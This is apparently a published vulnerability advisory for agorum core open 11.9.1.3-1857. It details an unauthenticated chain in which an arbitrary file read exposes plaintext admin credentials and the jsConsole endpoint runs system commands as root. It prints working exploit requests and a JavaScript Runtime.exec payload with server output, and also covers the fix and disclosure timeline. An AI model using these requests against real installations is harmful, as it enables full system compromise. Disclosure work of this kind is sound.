usd-2025-0030 | Agorum core open 11.9.1.3-1857 - Unauthenticated Remote Code Execution Chain

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Unauthenticated Remote Code Execution Chain
Security Risk: Critical
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Not requested
CVE Link: Not requested
Advisory ID: usd-2025-0030

Description

Agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.

Our researchers discovered multiple vulnerabilities in agorum core that, when chained together, allow an unauthenticated attacker to achieve full remote code execution with root privileges. This critical flaw enables complete system compromise without prior authentication.

Proof of Concept

The exploit chain consists of three distinct vulnerabilities. The initial entry point, identified as usd-2025-0022, allows unauthenticated attackers to read arbitrary files. By exploiting this flaw, an attacker can retrieve the application's configuration file identified in usd-2025-0023 which contains plaintext credentials for the mainadmin account. This can be achieved using the following request:

Request:

GET /dynawebservices/wsfiling/?action=getTemp&tmpFile=/opt/agorum/agorumcore/doc/agorum-core-datasheet.txt HTTP/1.1
Host: localhost
[...]

Response:

HTTP/1.1 200 OK
X-Powered-By: agorum core
Content-Length: 1673
Date: Mon, 05 May 2025 05:45:32 GMT
Server: Apache-Coyote/1.1

 

Datasheet agorum core:[...]
Access/Protocols: Web-Portal (secure):
[https://172.17.0.1:443]()
Web-Portal (unsecure):
[http://172.17.0.1:81]()
Networkdrive (DMS Filearea):
\\\\172.17.0.1\\dms
Networkdrive (My area):
\\\\172.17.0.1\\private
FTP Access:
172.17.0.1:21
IMAP-Interface:
172.17.0.1:143
SMTP-Interface:
172.17.0.1:2501
Mail-Domain:
agorumcore.com
SMTP-Server:
localhost:25
SMTP-User:
SMTP-Password:
Access data agorum core:
Username (Mainadmin):
roi
Password (Mainadmin: roi):
Changeme123456
Username (Demo):
demo
Password (Demo):
demoAccess
database (mysql):
database-Username:
root
database-Password:
Changeme123456
database-Host:
localhost
database-Port:
3306
[...]

At this stage, the attacker has successfully escalated privileges to the mainadmin level. As identified in usd-2025-0021, users with mainadmin privileges have the ability to execute arbitrary system commands. Since the application runs with root privileges by default, this leads to full system compromise.

Arbitrary command execution can be performed using the jsConsole function via the following request:

POST /api/rest/parse/jsConsole HTTP/1.1
Host: localhost
Cookie: JSESSIONID=[REDACTED];
[...]
js=var%20runCommand%20%3D%20function(cmd)%20%7B%0A%20%20%20%20var%20runtime%20%3D%20java.lang.Runtime.getRuntime()%3B%0A%20%20%20%20var%20process%20%3D%20runtime.exec(cmd)%3B%0A%0A%20%20%20%20var%20reader%20%3D%20new%20java.io.BufferedReader(%0A%20%20%20%20%20%20%20%20new%20java.io.InputStreamReader(process.getInputStream())%0A%20%20%20%20)%3B%0A%0A%20%20%20%20var%20line%3B%0A%20%20%20%20var%20output%20%3D%20%22%22%3B%0A%20%20%20%20while%20((line%20%3D%20reader.readLine())%20!%3D%20null)%20%7B%0A%20%20%20%20%20%20%20%20output%20%2B%3D%20line%20%2B%20%22%5Cn%22%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20reader.close()%3B%0A%20%20%20%20process.waitFor()%3B%0A%20%20%20%20return%20output%3B%0A%7D%3B%0ArunCommand(%22whoami%22)%3B%0A

The payload for the js parameter to execute the whoami command is as follows:

var runCommand = function(cmd)
 {    var runtime = java.lang.Runtime.getRuntime();
    var process = runtime.exec(cmd);
    var reader = new java.io.BufferedReader(
        new java.io.InputStreamReader(process.getInputStream())
    );
    var line;
    var output = "";
    while ((line = reader.readLine()) != null) {
        output += line + "\\n";
    }
    reader.close();
    process.waitFor();
    return output;
};
runCommand("whoami");

The server response will include the output of the executed command:

HTTP/1.1 200 OK
X-Powered-By: agorum core
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: [https://localhost]()
Date: Mon, 05 May 2025 05:55:46 GMT
Content-Type: application/json;charset=UTF-8
Server: Apache-Coyote/1.1
Content-Length: 145

 

{
 "success":true,
 "errorClass":0,
 "errorCode":0,"errorKey":0,
 "message":"",
 "result":"root\\n",
 "errorStack":null,
 "errorMessage":null,
 "executionTime":8
}

Fix


To mitigate this vulnerability chain, we recommend implementing strict authentication and access controls for all sensitive endpoints, especially those exposing file access or administrative functions. Input validation should be enforced to prevent injection attacks, and administrative features like command execution should be disabled by default or restricted to non-root contexts. Additionally, sensitive data such as configuration files and credentials should never be stored in plaintext.

 

Users of agorum core open can upgrade to 11.9.2 or 11.10.1.

References

Timeline

  • 2025-05-05: First contact request via mail.
  • 2025-05-05: The vendor has confirmed the delivery and has begun investigating the matter.
  • 2025-05-07: The vendor has begun addressing and fixing the issue.
  • 2025-05-15: The vendor has addressed and fixed the vulnerability within the cloud instances.
  • 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
  • 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.